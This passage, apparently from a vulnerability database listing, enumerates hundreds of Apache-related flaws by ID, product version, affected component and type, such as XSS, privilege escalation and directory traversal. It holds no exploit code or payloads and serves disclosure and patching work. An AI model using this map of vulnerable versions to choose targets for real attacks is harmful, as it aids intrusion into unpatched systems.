14392| [67911] Oracle Retail Clearance Optimization Engine 13.3/13.4/14.0 Apache commons-beanutils-1.8.0.jar memory corruption
14393| [67910] Oracle Retail Allocation up to 13.2 Apache commons-beanutils-1.8.0.jar memory corruption
14394| [71835] Apache Shiro 1.0.0/1.1.0/1.2.0/1.2.1/1.2.2 unknown vulnerability
14395| [71633] Apachefriends XAMPP 1.8.1 cross site scripting
14396| [71629] Apache Axis2/C spoofing
14397| [67633] Apple Mac OS X up to 10.9.4 apache_mod_php ext/standard/dns.c dns_get_record memory corruption
14398| [67631] Apple Mac OS X up to 10.9.4 apache_mod_php Symlink memory corruption
14399| [67630] Apple Mac OS X up to 10.9.4 apache_mod_php cdf_read_property_info denial of service
14400| [67629] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_count_chain denial of service
14401| [67628] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_check_stream_offset denial of service
14402| [67627] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c mconvert memory corruption
14403| [67626] Apple Mac OS X up to 10.9.4 apache_mod_php softmagic.c denial of service
14404| [67625] Apple Mac OS X up to 10.9.4 apache_mod_php Crash denial of service
14405| [67624] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_property_info denial of service
14406| [67623] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_unpack_summary_info denial of service
14407| [67622] Apple Mac OS X up to 10.9.4 apache_mod_php cdf.c cdf_read_short_sector denial of service
14408| [67620] Apple Mac OS X up to 10.9.4 apache_mod_php magic/Magdir/commands denial of service
14409| [67790] Apache HTTP Server mod_cache NULL Pointer Dereference denial of service
14410| [67522] Apache Tomcat up to 7.0.39 JSP Upload privilege escalation
14411| [70809] Apache POI up to 3.11 Crash denial of service
14412| [70808] Apache POI up to 3.10 unknown vulnerability
14413| [70806] Apache Commons-httpclient 4.2/4.2.1/4.2.2 spoofing
14414| [70749] Apache Axis up to 1.4 getCN spoofing
14415| [70701] Apache Traffic Server up to 3.3.5 denial of service
14416| [70700] Apache OFBiz up to 12.04.03 cross site scripting
14417| [67402] Apache OpenOffice 4.0.0/4.0.1/4.1.0 Calc privilege escalation
14418| [67401] Apache OpenOffice up to 4.1.0 OLE Object information disclosure
14419| [70661] Apache Subversion up to 1.6.17 denial of service
14420| [70660] Apache Subversion up to 1.6.17 spoofing
14421| [70659] Apache Subversion up to 1.6.17 spoofing
14422| [67183] Apache HTTP Server up to 2.4.9 mod_proxy denial of service
14423| [67180] Apache HTTP Server up to 2.4.9 WinNT MPM Memory Leak denial of service
14424| [67185] Apache HTTP Server up to 2.4.9 mod_status Heap-Based memory corruption
14425| [67184] Apache HTTP Server 2.4.5/2.4.6 mod_cache NULL Pointer Dereference denial of service
14426| [67182] Apache HTTP Server up to 2.4.9 mod_deflate Memory Consumption denial of service
14427| [67181] Apache HTTP Server up to 2.4.9 mod_cgid denial of service
14428| [70338] Apache Syncope up to 1.1.7 unknown vulnerability
14429| [70295] Apache CXF up to 2.7.9 Cleartext information disclosure
14430| [70106] Apache Open For Business Project up to 10.04.0 getServerError cross site scripting
14431| [70105] Apache MyFaces up to 2.1.5 JavaServer Faces directory traversal
14432| [69846] Apache HBase up to 0.94.8 information disclosure
14433| [69783] Apache CouchDB up to 1.2.0 memory corruption
14434| [13383] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 XML Parser privilege escalation
14435| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
14436| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
14437| [13164] Apache CXF up to 2.6.13/2.7.10 SOAP OutgoingChainInterceptor.java Invalid Content denial of service
14438| [13163] Apache CXF up to 2.6.13/2.7.10 SOAP HTML Content denial of service
14439| [13158] Apache Struts up to 2.3.16.2 ParametersInterceptor getClass privilege escalation
14440| [69515] Apache Struts up to 2.3.15.0 CookieInterceptor memory corruption
14441| [13086] Apache Struts up to 1.3.10 Class Loader privilege escalation
14442| [13067] Apache Struts up to 2.3.16.1 Class Loader privilege escalation
14443| [69431] Apache Archiva up to 1.3.6 cross site scripting
14444| [69385] Apache Syncope up to 1.1.6 unknown vulnerability
14445| [69338] Apache Xalan-Java up to 2.7.1 system-property unknown vulnerability
14446| [12742] Trustwave ModSecurity up to 2.7.5 Chunk Extension apache2/modsecurity.c modsecurity_tx_init privilege escalation
14447| [12741] Trustwave ModSecurity up to 2.7.6 Chunked HTTP Transfer apache2/modsecurity.c modsecurity_tx_init Trailing Header privilege escalation
14448| [13387] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Content-Length Header privilege escalation
14449| [13386] Apache Tomcat Security Manager up to 6.0.39/7.0.53/8.0.5 XSLT privilege escalation
14450| [13385] Apache Tomcat 8.0.0/8.0.1/8.0.3 AJP Request Zero Length denial of service
14451| [13384] Apache Tomcat up to 6.0.39/7.0.53/8.0.5 Chunked HTTP Request denial of service
14452| [12748] Apache CouchDB 1.5.0 UUIDS /_uuids denial of service
14453| [66739] Apache Camel up to 2.12.2 unknown vulnerability
14454| [66738] Apache Camel up to 2.12.2 unknown vulnerability
14455| [12667] Apache HTTP Server 2.4.7 mod_log_config.c log_cookie denial of service
14456| [66695] Apache CouchDB up to 1.2.0 cross site scripting
14457| [66694] Apache CouchDB up to 1.2.0 Partition partition2 directory traversal
14458| [66689] Apache HTTP Server up to 2.0.33 mod_dav dav_xml_get_cdata denial of service
14459| [12518] Apache Tomcat up to 6.0.38/7.0.49/8.0.0-RC9 HTTP Header denial of service
14460| [66498] Apache expressions up to 3.3.0 Whitelist unknown vulnerability
14461| [12781] Apache Struts up to 2.3.8 ParametersInterceptor getClass denial of service
14462| [12439] Apache Tomcat 6.0.33 XML XXE information disclosure
14463| [12438] Apache Tomcat 6.0.33/6.0.34/6.0.35/6.0.36/6.0.37 coyoteadapter.java disableURLRewriting privilege escalation
14464| [66356] Apache Wicket up to 6.8.0 information disclosure
14465| [12209] Apache Tomcat 7.0.0/7.0.50/8.0.0-RC1/8.0.1 Content-Type Header for Multi-Part Request Infinite Loop denial of service
14466| [66322] Apache ActiveMQ up to 5.8.0 cross site scripting
14467| [12291] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
14468| [66255] Apache Open For Business Project up to 10.04.3 cross site scripting
14469| [66200] Apache Hadoop up to 2.0.5 Security Feature information disclosure
14470| [66072] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
14471| [66068] Apache CloudStack up to 4.2.0 Stack-Based unknown vulnerability
14472| [11928] Oracle Secure Global Desktop up to 4.71 Apache Tomcat unknown vulnerability
14473| [11924] Oracle Secure Global Desktop up to 4.63 Apache Tomcat denial of service
14474| [11922] Oracle Secure Global Desktop up to 4.63 Apache Tomcat unknown vulnerability
14475| [66049] Apache XML Security for Java up to 1.4.6 Memory Consumption denial of service
14476| [12199] Apache Subversion up to 1.8.5 mod_dav_svn/repos.c get_resource denial of service
14477| [65946] askapache Firefox Adsense up to 3.0 askapache-firefox-adsense.php cross site request forgery
14478| [65668] Apache Solr 4.0.0 Updater denial of service
14479| [65665] Apache Solr up to 4.3.0 denial of service
14480| [65664] Apache Solr 3.6.0/3.6.1/3.6.2/4.0.0 Updater denial of service
14481| [65663] Apache Solr up to 4.5.1 ResourceLoader directory traversal
14482| [65658] Apache roller 4.0/4.0.1/5.0/5.0.1 unknown vulnerability
14483| [65657] Apache Roller 4.0/4.0.1/5.0/5.0.1 cross site scripting
14484| [11325] Apache Subversion 1.7.13 mod_dontdothat Bypass denial of service
14485| [11324] Apache Subversion up to 1.8.4 mod_dav_svn denial of service
14486| [11098] Apache Tomcat 5.5.25 HTTP Request cross site request forgery
14487| [65410] Apache Struts 2.3.15.3 cross site scripting
14488| [65386] Apache Solr up to 2.2.1 on TYPO3 cross site scripting
14489| [65385] Apache Solr up to 2.2.1 on TYPO3 unknown vulnerability
14490| [11044] Apache Struts 2.3.15.3 showConfig.action cross site scripting
14491| [11043] Apache Struts 2.3.15.3 actionNames.action cross site scripting
14492| [11018] cPanel WHM up to 11.40.0.11 Apache mod_userdir Tweak Interface privilege escalation
14493| [65342] Apache Sling 1.0.2/1.0.4/1.0.6/1.1.0/1.1.2 Auth Core cross site scripting
14494| [65340] Apache Shindig 2.5.0 information disclosure
14495| [65316] Apache Mod Fcgid up to 2.3.7 mod_fcgid fcgid_bucket.c fcgid_header_bucket_read memory corruption
14496| [65313] Apache Sling 2.2.0/2.3.0 AbstractCreateOperation.java deepGetOrCreateNode denial of service
14497| [10826] Apache Struts 2 File privilege escalation
14498| [65204] Apache Camel up to 2.10.1 unknown vulnerability
14499| [10460] Apache Struts 2.0.0/2.3.15.1 Action Mapping Mechanism Bypass privilege escalation
14500| [10459] Apache Struts 2.0.0/2.3.15 Dynamic Method Invocation unknown vulnerability
14501| [10160] Apache Subversion 1.8.0/1.8.1/1.8.2 svnwcsub.py handle_options race condition
14502| [10159] Apache Subversion up to 1.8.2 svnserve write_pid_file race condition
14503| [10158] Apache Subversion 1.8.0/1.8.1/1.8.2 daemonize.py daemon::daemonize race condition
14504| [10157] Apache Subversion up to 1.8.1 FSFS Repository Symlink privilege escalation
14505| [64808] Fail2ban up to 0.8.9 apache-auth.conf denial of service
14506| [64760] Best Practical RT up to 4.0.12 Apache::Session::File information disclosure
14507| [64722] Apache XML Security for C++ Heap-based memory corruption
14508| [64719] Apache XML Security for C++ Heap-based memory corruption
14509| [64718] Apache XML Security for C++ verify denial of service
14510| [64717] Apache XML Security for C++ getURIBaseTXFM memory corruption
14511| [64716] Apache XML Security for C++ spoofing
14512| [64701] Apache CXF up to 2.7.3 XML Parser Memory Consumption denial of service
14513| [64700] Apache CloudStack up to 4.1.0 Stack-Based cross site scripting
14514| [64667] Apache Open For Business Project up to 10.04.04 unknown vulnerability
14515| [64666] Apache Open For Business Project up to 10.04.04 cross site scripting
14516| [9891] Apache HTTP Server 2.2.22 suEXEC Feature .htaccess information disclosure
14517| [64509] Apache ActiveMQ up to 5.8.0 scheduled.jsp cross site scripting
14518| [9826] Apache Subversion up to 1.8.0 mod_dav_svn denial of service
14519| [9683] Apache HTTP Server 2.4.5 mod_session_dbd denial of service
14520| [64485] Apache Struts up to 2.2.3.0 privilege escalation
14521| [9568] Apache Struts up to 2.3.15 DefaultActionMapper cross site request forgery
14522| [9567] Apache Struts up to 2.3.15 DefaultActionMapper memory corruption
14523| [64467] Apache Geronimo 3.0 memory corruption
14524| [64466] Apache OpenJPA up to 2.2.1 Serialization memory corruption
14525| [64457] Apache Struts up to 2.2.3.0 cross site scripting
14526| [64326] Alejandro Garza Apachesolr Autocomplete up to 7.x-1.1 cross site scripting
14527| [9184] Apache Qpid up to 0.20 SSL misconfiguration
14528| [8935] Apache Subversion up to 1.7.9 FSFS Format Repository denial of service
14529| [8934] Apache Subversion up to 1.7.9 Svnserve Server denial of service
14530| [8933] Apache Subversion up to 1.6.21 check-mime-type.pl svnlook memory corruption
14531| [8932] Apache Subversion up to 1.6.21 svn-keyword-check.pl svnlook changed memory corruption
14532| [9022] Apache Struts up to 2.3.14.2 OGNL Expression memory corruption
14533| [8873] Apache Struts 2.3.14 privilege escalation
14534| [8872] Apache Struts 2.3.14 privilege escalation
14535| [8746] Apache HTTP Server Log File Terminal Escape Sequence Filtering mod_rewrite.c do_rewritelog privilege escalation
14536| [8666] Apache Tomcat up to 7.0.32 AsyncListener information disclosure
14537| [8665] Apache Tomcat up to 7.0.29 Chunked Transfer Encoding Extension Size denial of service
14538| [8664] Apache Tomcat up to 7.0.32 FORM Authentication weak authentication
14539| [64075] Apache Subversion up to 1.7.7 mod_dav_svn Crash denial of service
14540| [64074] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
14541| [64073] Apache Subversion up to 1.7.8 mod_dav_svn NULL Pointer Dereference denial of service
14542| [64072] Apache Subversion up to 1.7.7 mod_dav_svn NULL Pointer Dereference denial of service
14543| [64071] Apache Subversion up to 1.7.8 mod_dav_svn Memory Consumption denial of service
14544| [8768] Apache Struts up to 2.3.14 on Mac EL and OGNL Interpreter memory corruption
14545| [64006] Apache ActiveMQ up to 5.7.0 denial of service
14546| [64005] Apache ActiveMQ up to 5.7.0 Default Configuration denial of service
14547| [64004] Apache ActiveMQ up to 5.7.0 PortfolioPublishServlet.java cross site scripting
14548| [8427] Apache Tomcat Session Transaction weak authentication
14549| [63960] Apache Maven 3.0.4 Default Configuration spoofing
14550| [63751] Apache qpid up to 0.20 qpid::framing::Buffer denial of service
14551| [63750] Apache qpid up to 0.20 checkAvailable denial of service
14552| [63749] Apache Qpid up to 0.20 Memory Consumption denial of service
14553| [63748] Apache Qpid up to 0.20 Default Configuration denial of service
14554| [63747] Apache Rave up to 0.20 User Account information disclosure
14555| [7889] Apache Subversion up to 1.6.17 mod_dav_svn/svn_fs_file_length() denial of service
14556| [63646] Apache HTTP Server up to 2.2.23/2.4.3 mod_proxy_balancer.c balancer_handler cross site scripting
14557| [7688] Apache CXF up to 2.7.1 WSS4JInterceptor Bypass weak authentication
14558| [7687] Apache CXF up to 2.7.2 Token weak authentication
14559| [63334] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
14560| [63299] Apache CXF up to 2.6.0 WS-Security unknown vulnerability
14561| [7202] Apache HTTP Server 2.4.2 on Oracle Solaris ld_library_path cross site scripting
14562| [7075] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector NioEndpoint.java denial of service
14563| [7074] Apache Tomcat up to 6.0.35/7.0.29 FORM Authentication RealmBase.java weak authentication
14564| [7073] Apache Tomcat up to 6.0.35/7.0.31 CSRF Prevention Filter cross site request forgery
14565| [63090] Apache Tomcat up to 4.1.24 denial of service
14566| [63089] Apache HTTP Server up to 2.2.13 mod_proxy_ajp denial of service
14567| [62933] Apache Tomcat up to 5.5.0 Access Restriction unknown vulnerability
14568| [62929] Apache Tomcat up to 6.0.35/7.0.27 NIO Connector Memory Consumption denial of service
14569| [62833] Apache CXF -/2.6.0 spoofing
14570| [62832] Apache Axis2 up to 1.6.2 spoofing
14571| [62831] Apache Axis up to 1.4 Java Message Service spoofing
14572| [62830] Apache Commons-httpclient 3.0 Payments spoofing
14573| [62826] Apache Libcloud up to 0.11.0 spoofing
14574| [62757] Apache Open For Business Project up to 10.04.0 unknown vulnerability
14575| [8830] Red Hat JBoss Enterprise Application Platform 6.0.1 org.apache.catalina.connector.Response.encodeURL information disclosure
14576| [62661] Apache Axis2 unknown vulnerability
14577| [62658] Apache Axis2 unknown vulnerability
14578| [62467] Apache Qpid up to 0.17 denial of service
14579| [62417] Apache CXF 2.4.7/2.4.8/2.5.3/2.5.4/2.6.1 spoofing
14580| [6301] Apache HTTP Server mod_pagespeed cross site scripting
14581| [6300] Apache HTTP Server mod_pagespeed Hostname information disclosure
14582| [6123] Apache Wicket up to 1.5.7 Ajax Link cross site scripting
14583| [62035] Apache Struts up to 2.3.4 denial of service
14584| [61916] Apache QPID 0.5/0.6/0.14/0.16 unknown vulnerability
14585| [6998] Apache Tomcat 5.5.35/6.0.35/7.0.28 DIGEST Authentication Session State Caching privilege escalation
14586| [6997] Apache Tomcat 5.5.35/6.0.35/7.0.28 HTTP Digest Authentication Implementation privilege escalation
14587| [6092] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_ajp.c information disclosure
14588| [6090] Apache HTTP Server 2.4.0/2.4.1/2.4.2 mod_proxy_http.c information disclosure
14589| [61507] Apache POI up to 3.8 UnhandledDataStructure denial of service
14590| [6070] Apache Struts up to 2.3.4 Token Name Configuration Parameter privilege escalation
14591| [6069] Apache Struts up to 2.3.4 Request Parameter OGNL Expression denial of service
14592| [5764] Oracle Solaris 10 Apache HTTP Server information disclosure
14593| [5700] Oracle Secure Backup 10.3.0.3/10.4.0.1 Apache denial of service
14594| [61255] Apache Hadoop 2.0.0 Kerberos unknown vulnerability
14595| [61229] Apache Sling up to 2.1.1 denial of service
14596| [61152] Apache Commons-compress 1.0/1.1/1.2/1.3/1.4 denial of service
14597| [61094] Apache Roller up to 5.0 cross site scripting
14598| [61093] Apache Roller up to 5.0 cross site request forgery
14599| [61005] Apache OpenOffice 3.3/3.4 unknown vulnerability
14600| [9673] Apache HTTP Server up to 2.4.4 mod_dav mod_dav.c Request denial of service
14601| [5436] Apache OpenOffice 3.3/3.4 WPXContentListener.cpp _closeTableRow File memory corruption
14602| [5435] Apache OpenOffice 3.3/3.4 vclmi.dll File memory corruption
14603| [60730] PHP 5.4.0/5.4.1/5.4.2 apache_request_headers memory corruption
14604| [60708] Apache Qpid 0.12 unknown vulnerability
14605| [5032] Apache Hadoop up to 0.20.205.0/1.0.1/0.23.1 Kerberos/MapReduce Security Feature privilege escalation
14606| [4949] Apache Struts File Upload XSLTResult.java XSLT File privilege escalation
14607| [4955] Apache Traffic Server 3.0.3/3.1.2 HTTP Header Parser memory corruption
14608| [4882] Apache Wicket up to 1.5.4 directory traversal
14609| [4881] Apache Wicket up to 1.4.19 cross site scripting
14610| [4884] Apache HTTP Server up to 2.3.6 mod_fcgid fcgid_spawn_ctl.c FcgidMaxProcessesPerClass HTTP Requests denial of service
14611| [60352] Apache Struts up to 2.2.3 memory corruption
14612| [60153] Apache Portable Runtime up to 1.4.3 denial of service
14613| [4598] Apache Struts 1.3.10 upload-submit.do cross site scripting
14614| [4597] Apache Struts 1.3.10 processSimple.do cross site scripting
14615| [4596] Apache Struts 2.0.14/2.2.3 struts2-rest-showcase/orders cross site scripting
14616| [4595] Apache Struts 2.0.14/2.2.3 struts2-showcase/person/editPerson.action cross site scripting
14617| [4583] Apache HTTP Server up to 2.2.21 Threaded MPM denial of service
14618| [4582] Apache HTTP Server up to 2.2.21 protocol.c information disclosure
14619| [4571] Apache Struts up to 2.3.1.2 privilege escalation
14620| [4557] Apache Tomcat up to 7.0.21 Caching/Recycling information disclosure
14621| [59934] Apache Tomcat up to 6.0.9 DigestAuthenticator.java unknown vulnerability
14622| [59933] Apache Tomcat up to 6.0.9 Access Restriction unknown vulnerability
14623| [59932] Apache Tomcat up to 6.0.9 unknown vulnerability
14624| [59931] Apache Tomcat up to 6.0.9 Access Restriction information disclosure
14625| [59902] Apache Struts up to 2.2.3 Interfaces unknown vulnerability
14626| [4528] Apache Struts up to 2.2.3 DebuggingInterceptor privilege escalation
14627| [4527] Apache Struts up to 2.2.3 ExceptionDelegator cross site scripting
14628| [59888] Apache Tomcat up to 6.0.6 denial of service
14629| [59886] Apache ActiveMQ up to 5.5.1 Crash denial of service
14630| [4513] Apache Struts up to 2.3.1 ParameterInterceptor directory traversal
14631| [4512] Apache Struts up to 2.2.3 CookieInterceptor privilege escalation
14632| [59850] Apache Geronimo up to 2.2.1 denial of service
14633| [59825] Apache HTTP Server up to 2.1.7 mod_reqtimeout denial of service
14634| [59556] Apache HTTP Server up to 2.0.53 mod_proxy information disclosure
14635| [58467] Apache libcloud 0.2.0/0.3.0/0.3.1/0.4.0 Access Restriction spoofing
14636| [58413] Apache Tomcat up to 6.0.10 spoofing
14637| [58381] Apache Wicket up to 1.4.17 cross site scripting
14638| [58296] Apache Tomcat up to 7.0.19 unknown vulnerability
14639| [57888] Apache HttpClient 4.0/4.0.1/4.1 Authorization information disclosure
14640| [57587] Apache Subversion up to 1.6.16 mod_dav_svn information disclosure
14641| [57585] Apache Subversion up to 1.6.16 mod_dav_svn Memory Consumption denial of service
14642| [57584] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
14643| [57577] Apache Rampart-C 1.3.0 Access Restriction rampart_timestamp_token_validate privilege escalation
14644| [57568] Apache Archiva up to 1.3.4 cross site scripting
14645| [57567] Apache Archiva up to 1.3.4 cross site request forgery
14646| [57481] Apache Tomcat 7.0.12/7.0.13 Access Restriction unknown vulnerability
14647| [4355] Apache HTTP Server APR apr_fnmatch denial of service
14648| [57435] Apache Struts up to 2.2.1.1 FileHandler.java cross site scripting
14649| [57425] Apache Struts up to 2.2.1.1 cross site scripting
14650| [4352] Apache HTTP Server 2.2.x APR apr_fnmatch denial of service
14651| [57025] Apache Tomcat up to 7.0.11 information disclosure
14652| [57024] Apache Tomcat 7.0.11 Access Restriction information disclosure
14653| [56774] IBM WebSphere Application Server up to 7.0.0.14 org.apache.jasper.runtime.JspWriterImpl.response denial of service
14654| [56824] Apache Subversion up to 1.6.4 mod_dav_svn NULL Pointer Dereference denial of service
14655| [56832] Apache Tomcat up to 7.0.10 Access Restriction information disclosure
14656| [56830] Apache Tomcat up to 7.0.9 Access Restriction privilege escalation
14657| [12440] Apache Tomcat 6.0.33 Malicious Request cross site scripting
14658| [56512] Apache Continuum up to 1.4.0 cross site scripting
14659| [4285] Apache Tomcat 5.x JVM getLocale denial of service
14660| [4284] Apache Tomcat 5.x HTML Manager Infinite Loop cross site scripting
14661| [4283] Apache Tomcat 5.x ServletContect privilege escalation
14662| [56441] Apache Tomcat up to 7.0.6 denial of service
14663| [56300] Apache CouchDB up to 1.0.1 Web Administration Interface cross site scripting
14664| [55967] Apache Subversion up to 1.6.4 rev_hunt.c denial of service
14665| [55966] Apache Subversion up to 1.6.4 mod_dav_svn repos.c walk denial of service
14666| [55095] Apache Axis2 up to 1.6 Default Password memory corruption
14667| [55631] Apache Archiva up to 1.3.1 User Account cross site request forgery
14668| [55556] Apache Tomcat up to 6.0.29 Default Configuration information disclosure
14669| [55553] Apache Tomcat up to 7.0.4 sessionsList.jsp cross site scripting
14670| [55162] Apache MyFaces up to 2.0.0 Authentication Code unknown vulnerability
14671| [54881] Apache Subversion up to 1.6.12 mod_dav_svn authz.c privilege escalation
14672| [54879] Apache APR-util up to 0.9.14 mod_reqtimeout apr_brigade_split_line denial of service
14673| [54693] Apache Traffic Server DNS Cache unknown vulnerability
14674| [54416] Apache CouchDB up to 0.11.0 cross site request forgery
14675| [54394] Apache CXF up to 2.2.8 Memory Consumption denial of service
14676| [54261] Apache Tomcat jsp/cal/cal2.jsp cross site scripting
14677| [54166] Apache HTTP Server up to 2.2.12 mod_cache Crash denial of service
14678| [54385] Apache Struts up to 2.1.8.1 ParameterInterceptor unknown vulnerability
14679| [54012] Apache Tomcat up to 6.0.10 denial of service
14680| [53763] Apache Axis2 1.3/1.4/1.4.1/1.5/1.5.1 Memory Consumption denial of service
14681| [53368] Apache MyFaces 1.1.7/1.2.8 cross site scripting
14682| [53397] Apache axis2 1.4.1/1.5.1 Administration Console cross site scripting
14683| [52894] Apache Tomcat up to 6.0.7 information disclosure
14684| [52960] Apache ActiveMQ up to 5.4-snapshot information disclosure
14685| [52843] Apache HTTP Server mod_auth_shadow unknown vulnerability
14686| [52786] Apache Open For Business Project up to 09.04 cross site scripting
14687| [52587] Apache ActiveMQ up to 5.3.0 cross site request forgery
14688| [52586] Apache ActiveMQ up to 5.3.0 cross site scripting
14689| [52584] Apache CouchDB up to 0.10.1 information disclosure
14690| [51757] Apache HTTP Server 2.0.44 cross site scripting
14691| [51756] Apache HTTP Server 2.0.44 spoofing
14692| [51717] Apache HTTP Server up to 1.3.3 mod_proxy ap_proxy_send_fb memory corruption
14693| [51690] Apache Tomcat up to 6.0 directory traversal
14694| [51689] Apache Tomcat up to 6.0 information disclosure
14695| [51688] Apache Tomcat up to 6.0 directory traversal
14696| [50886] HP Operations Manager 8.10 on Windows File Upload org.apache.catalina.manager.HTMLManagerServlet memory corruption
14697| [50802] Apache Tomcat up to 3.3 Default Password weak authentication
14698| [50626] Apache Solr 1.0.0 cross site scripting
14699| [49857] Apache HTTP Server mod_proxy_ftp cross site scripting
14700| [49856] Apache HTTP Server 2.2.13 mod_proxy_ftp ap_proxy_ftp_handler denial of service
14701| [49348] Apache Xerces-C++ 2.7.0 Stack-Based denial of service
14702| [86789] Apache Portable Runtime memory/unix/apr_pools.c unknown vulnerability
14703| [49283] Apache APR-util up to 1.3.8 apr-util misc/apr_rmm.c apr_rmm_realloc memory corruption
14704| [48952] Apache HTTP Server up to 1.3.6 mod_deflate denial of service
14705| [48626] Apache Tomcat up to 4.1.23 Access Restriction directory traversal
14706| [48431] Apache Tomcat up to 4.1.23 j_security_check cross site scripting
14707| [48430] Apache Tomcat up to 4.1.23 mod_jk denial of service
14708| [47801] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site request forgery
14709| [47800] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console cross site scripting
14710| [47799] Apache Geronimo 2.1/2.1.1/2.1.2/2.1.3 Administration Console directory traversal
14711| [47648] Apache Tiles 2.1.0/2.1.1 cross site scripting
14712| [47640] Apache Struts 2.0.6/2.0.8/2.0.9/2.0.11/2.1 cross site scripting
14713| [47638] Apache Tomcat up to 4.1.23 mod_jk information disclosure
14714| [47636] Apache Struts 2.0.9 xip_client.html cross site scripting
14715| [47593] Apache Mod Perl 1 perl-status Apache::Status cross site scripting
14716| [47637] Apache Struts 1.0.2/1.1/1.2.4/1.2.7/1.2.8 cross site scripting
14717| [47239] Apache Struts up to 2.1.2 Beta struts directory traversal
14718| [47214] Apachefriends xampp 1.6.8 spoofing
14719| [47213] Apachefriends xampp 1.6.8 htaccess cross site request forgery
14720| [47162] Apachefriends XAMPP 1.4.4 weak authentication
14721| [47065] Apache Tomcat 4.1.23 cross site scripting
14722| [46834] Apache Tomcat up to 5.5.20 cross site scripting
14723| [46004] Apache Jackrabbit 1.4/1.5.0 search.jsp cross site scripting
14724| [49205] Apache Roller 2.3/3.0/3.1/4.0 Search cross site scripting
14725| [86625] Apache Struts directory traversal
14726| [44461] Apache Tomcat up to 5.5.0 information disclosure
14727| [44389] Apache Xerces-C++ XML Parser Memory Consumption denial of service
14728| [44352] Apache Friends XAMPP 1.6.8 adodb.php cross site scripting
14729| [43663] Apache Tomcat up to 6.0.16 directory traversal
14730| [43612] Apache Friends XAMPP 1.6.7 iart.php cross site scripting
14731| [43556] Apache HTTP Server up to 2.1.8 mod_proxy_ftp proxy_ftp.c cross site scripting
14732| [43516] Apache Tomcat up to 4.1.20 directory traversal
14733| [43509] Apache Tomcat up to 6.0.13 cross site scripting
14734| [42637] Apache Tomcat up to 6.0.16 cross site scripting
14735| [42325] Apache HTTP Server up to 2.1.8 Error Page cross site scripting
14736| [41838] Apache-SSL 1.3.34 1.57 expandcert privilege escalation
14737| [41091] Apache Software Foundation Mod Jk up to 2.0.1 mod_jk2 Stack-based memory corruption
14738| [40924] Apache Tomcat up to 6.0.15 information disclosure
14739| [40923] Apache Tomcat up to 6.0.15 unknown vulnerability
14740| [40922] Apache Tomcat up to 6.0 information disclosure
14741| [40710] Apache HTTP Server up to 2.0.61 mod_negotiation cross site scripting
14742| [40709] Apache HTTP Server up to 2.0.53 mod_negotiation cross site scripting
14743| [40656] Apache Tomcat 5.5.20 information disclosure
14744| [40503] Apache HTTP Server mod_proxy_ftp cross site scripting
14745| [40502] Apache HTTP Server up to 2.2.5 mod_proxy_balancer memory corruption
14746| [40501] Apache HTTP Server 2.2.6 mod_proxy_balancer cross site request forgery
14747| [40398] Apache HTTP Server up to 2.2 mod_proxy_balancer cross site scripting
14748| [40397] Apache HTTP Server up to 2.2 mod_proxy_balancer balancer_handler denial of service
14749| [40234] Apache Tomcat up to 6.0.15 directory traversal
14750| [40221] Apache HTTP Server 2.2.6 information disclosure
14751| [40027] David Castro Apache Authcas 0.4 sql injection
14752| [3495] Apache OpenOffice up to 2.3 Database Document Processor unknown vulnerability
14753| [3489] Apache HTTP Server 2.x HTTP Header cross site scripting
14754| [3414] Apache Tomcat WebDAV Stored privilege escalation
14755| [39489] Apache Jakarta Slide up to 2.1 directory traversal
14756| [39540] Apache Geronimo 2.0/2.0.1/2.0.2/2.1 unknown vulnerability
14757| [3310] Apache OpenOffice 1.1.3/2.0.4/2.2.1 TIFF Image Parser Heap-based memory corruption
14758| [38768] Apache HTTP Server up to 2.1.7 mod_autoindex.c cross site scripting
14759| [38952] Apache Geronimo 2.0.1/2.1 unknown vulnerability
14760| [38658] Apache Tomcat 4.1.31 cal2.jsp cross site request forgery
14761| [38524] Apache Geronimo 2.0 unknown vulnerability
14762| [3256] Apache Tomcat up to 6.0.13 cross site scripting
14763| [38331] Apache Tomcat 4.1.24 information disclosure
14764| [38330] Apache Tomcat 4.1.24 information disclosure
14765| [38185] Apache Tomcat 3.3/3.3.1/3.3.1a/3.3.2 Error Message CookieExample cross site scripting
14766| [37967] Apache Tomcat up to 4.1.36 Error Message sendmail.jsp cross site scripting
14767| [37647] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 Authorization unknown vulnerability
14768| [37646] Apache Derby 10.1.1.0/10.1.2.1/10.1.3.1 unknown vulnerability
14769| [3141] Apache Tomcat up to 4.1.31 Accept-Language Header cross site scripting
14770| [3133] Apache Tomcat up to 6.0 HTTP cross site scripting
14771| [37292] Apache Tomcat up to 5.5.1 cross site scripting
14772| [3130] Apache OpenOffice 2.2.1 RTF Document Heap-based memory corruption
14773| [36981] Apache Tomcat JK Web Server Connector up to 1.2.22 mod_jk directory traversal
14774| [36892] Apache Tomcat up to 4.0.0 hello.jsp cross site scripting
14775| [37320] Apache MyFaces Tomahawk up to 1.1.4 cross site scripting
14776| [36697] Apache Tomcat up to 5.5.17 implicit-objects.jsp cross site scripting
14777| [36491] Apache Axis 1.0 Installation javaioFileNotFoundException information disclosure
14778| [36400] Apache Tomcat 5.5.15 mod_jk cross site scripting
14779| [36698] Apache Tomcat up to 4.0.0 cal2.jsp cross site scripting
14780| [36224] XAMPP Apache Distribution up to 1.6.0a adodb.php connect memory corruption
14781| [36225] XAMPP Apache Distribution 1.6.0a sql injection
14782| [2997] Apache httpd/Tomcat 5.5/6.0 directory traversal
14783| [35896] Apache Apache Test up to 1.29 mod_perl denial of service
